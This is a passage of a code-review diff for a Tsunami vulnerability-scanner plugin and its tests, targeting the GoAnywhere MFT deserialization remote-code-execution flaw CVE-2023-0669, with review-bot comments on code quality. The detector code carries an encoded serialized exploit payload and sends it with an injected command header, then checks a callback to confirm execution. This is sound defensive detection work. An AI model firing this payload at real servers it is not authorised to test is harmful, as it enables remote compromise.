rycXjtISPU8ZWnf9tSQh-nUBplB2Go2WSmmLk1Rhu0deMsChn6dI7OQ-ed-36C_on1CY5bSuEkpJxxsNrcZTdmRG3KPlwHVcZ1kfFKlSTnFPjoOq1VLgLGuaOJFFiTerU2tbfj8rbgZbYOeZZToik7OirRjX_oTyKwHGQq5Y0d_W1Whwr8i5xK-V4HsdDOAOPv7NzL8-yxnL73kWP2357B_8yvUxHKjZ_ynyr--_ueBVZbOwnt4oBpbtsLh7_A6vo0MdBs2HpRRq8USpxlgN_s_2DNFRrxejgphOPDeHT-_mh7ey3lSZNMt3NU2M7lPWzWsffu5R5PXY9BxJT0PsUAgJS3i-sB5D4Fg7e4WiF83UroEYaz9mM0B-7VQ7hkqBgPEiDH2rZpUyhsG51TlYSbzb46g41vXdFpygqntOlEgBYkVbLwN3fIM9s2RL4908QD8o-ePuO-CnFL5KU5Yh7IcBx8a2FovJf07J7IoShuB2grZ7Uq8hwa5OJjZ0yN1pz1KsdT_OKONiiDiWvf67QRkrogsxA2PbFC4Qhr1ZwOnEO8fhZTFx_fdt5_z7RkjfObiDBNqGGY5iBnjxinzh67mODT_vohU7L3gPCkVnqcU2zUbiBsT-Xu0HGyQOPpBp5wS2QHln6GdmTkmARnSa4Mc1CU0x4YzmAoTU4v8xLCtucHHFHrYMB_MFJg_2rM_XxJVKjnU2ej7BFSbnyc_1XE12z9ca6dYywmwtTFtHSpJf-70SBU_nebcnTcUXMp2JTWdRUgGScybrwM4wGSYUq7THJqm297dQ9fJ9GjnWLOK3JQ7K2GjVWWmXKrlYlwKgx_3XDU
UYErlZAw13_iQXLMZOUteWthVndxp9STpcQ"; + try { + HttpResponse httpResponse = + httpClient.send( + post(licenseUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader( + "Content-Type", + "application/x-www-form-urlencoded; " + "charset=UTF-8") + .addHeader(COMMAND_HEADER, commandToInject) + .build()) + .setRequestBody(ByteString.copyFromUtf8(deserialized)) + .build(), + networkService); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Request to target %s failed", networkService); + } + return payload.checkIfExecuted(); + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2023-0669")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-0669")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-0669: GoAnywhere MFT RCE vulnerability") + .setDescription( + "GoAnywhere MFT suffers from a pre-authentication command injection " + + "vulnerability in the License Response Servlet due to deserializing" + + " an arbitrary attacker-controlled object.All versions prior to 7.1.1 are affected") + .setRecommendation( + "Update GoAnywhere MFT to a version that provides a fix 7.1.2 or later")) + .build(); + } +} 
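Review bot: `detect` declares its second parameter as the raw type `ImmutableList matchedServices`, which discards the element type and compiles only with an unchecked warning; it should be `ImmutableList<NetworkService> matchedServices`, the typed signature the stream pipeline beneath it already assumes. The class Javadoc is wrong as well, reading `detects the CVE-2022-0540 vulnerability. Reading`; replace it with `/** A {@link VulnDetector} that detects the CVE-2023-0669 GoAnywhere MFT pre-authentication RCE. */`. The affected-version wording is inconsistent inside this one file: the `@PluginInfo` description says "version 7.1.1 and its earlier versions" (and its string concatenation runs "object." straight into "version" with no separator), whereas the report description says "All versions prior to 7.1.1 are affected" while the recommendation names 7.1.2 as the fix, so settle on one statement, use it in both strings, and update the test's expected report to match. `String.format("%s", payload.getPayload())` is an identity call and can simply be `payload.getPayload()`, and the wildcard `import com.google.tsunami.proto.*;` should be expanded to the proto types actually used.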
diff --git a/community/detectors/goanywhere_cve_2023_0669/src/test/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorWithCallbackServerTest.java b/community/detectors/goanywhere_cve_2023_0669/src/test/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorWithCallbackServerTest.java
new file mode 100644
index 000000000..89cd7a18c
--- /dev/null
+++ b/community/detectors/goanywhere_cve_2023_0669/src/test/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorWithCallbackServerTest.java
@@ -0,0 +1,129 @@ +package com.google.tsunami.plugins.detectors.goanywhere; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.*; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public class Cve20230669DetectorWithCallbackServerTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-09-24T00:00:00.00Z")); + + @Inject private Cve20230669VulnDetector detector; + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService service; + + // A version of secure random that gives predictable output for our unit tests + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockWebServer.start(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new 
Cve20230669DetectorBootstrapModule()) + .injectMembers(this); + + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("goanywhere")) + .setServiceName("http") + .build(); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + mockWebServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code())); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2023-0669")) + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023" + "-0669")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-0669: GoAnywhere MFT RCE vulnerability") + .setDescription( + "GoAnywhere MFT suffers from a pre-authentication command injection " + + "vulnerability in the License Response Servlet due to " + + "deserializing an arbitrary attacker-controlled object.All versions prior to 7.1.1 are affected") + .setRecommendation( + "Update GoAnywhere MFT to a 
version that " + + "provides a fix 7.1.2 or later")) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnsnoVulnerability() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.SERVICE_UNAVAILABLE.code())); + + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .build(); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } +}
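Review bot: Neither test inspects what the detector actually sent to `mockWebServer`, so `detect_whenVulnerable_returnsVulnerability` still passes if the request goes to the wrong path or omits the command header; after the `detect(...)` call add `RecordedRequest request = mockWebServer.takeRequest();` and `assertThat(request.getPath()).isEqualTo("/goanywhere/lic/accept");` (importing `okhttp3.mockwebserver.RecordedRequest` and Truth's `assertThat`, and adding `InterruptedException` to the throws clause), and likewise assert `request.getHeader("x-protect")` is not null. The comment `// A version of secure random that gives predictable output for our unit tests` above `setUp` describes nothing that follows and appears to be a leftover from a template; delete it. `detect_whenNotVulnerable_returnsnoVulnerability` should be `returnsNoVulnerability`, and `"CVE-2023" + "-0669"` is a needless split of a literal written whole a few lines earlier. The expected description here must track whatever affected-version wording the detector settles on, since both currently say "prior to 7.1.1" while the recommendation names 7.1.2.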